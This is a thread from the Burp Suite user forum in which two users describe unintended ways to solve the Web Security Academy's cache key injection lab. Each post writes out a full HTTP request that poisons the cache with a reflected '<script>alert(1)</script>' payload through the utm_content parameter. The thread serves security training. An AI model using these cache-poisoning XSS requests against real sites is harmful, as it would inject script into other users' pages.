Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

Lab: Cache key injection

Anton | Last updated: Jul 14, 2022 01:48PM UTC

Hi, it seems that this lab can be solved without key injection, simply by caching this at the redirect: GET /login?lang=en?utm_content='/><script>alert(1)</script><' HTTP/1.1 Host: 0a2e00a50385b22cc025239e00f8009b.web-security-academy.net Cookie: session=YukqrX6kheQFOEdzhS1sQPm7uqJjc0oN; lang=en Pragma: x-get-cache-key User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://0a2e00a50385b22cc025239e00f8009b.web-security-academy.net/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 Cache-Control: max-age=0 Te: trailers Connection: close This is probably not intended, but it is possible to escape one of the links in this way.

Michelle, PortSwigger Agent | Last updated: Jul 14, 2022 03:03PM UTC

There can be a few different ways to solve a lab, as we verify whether the lab conditions have been met rather than verifying that the method used matches the lab solution. Congratulations on finding an alternate solution to the lab :)

majortom | Last updated: May 23, 2023 09:58AM UTC

I found a similar unintended solution: you just poison the cache key for the main page - the one where you see blog posts listed (cache key for it is: /$$) with the utm_content=test'/><script>alert(1)</script> parameter that is reflected in the main page <link> tag. As the two requests have the same cache key (/$$) we can poison the caching mechanism GET /?utm_content=test'/><script>alert(1)</script> HTTP/2 Host: 0a920039034e23e982eaa1f2000900c3.web-security-academy.net Cookie: session=6IJGsV611zAzd9ZFE5lkWbBTT5ubaYfB; lang=en User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Dnt: 1 Sec-Gpc: 1 Te: trailers Pragma: x-get-cache-key

Michelle, PortSwigger Agent | Last updated: May 24, 2023 07:38AM UTC

Thanks for getting in touch. We'll pass those details on to the team.

You need to Log in to post a reply. Or register here, for free.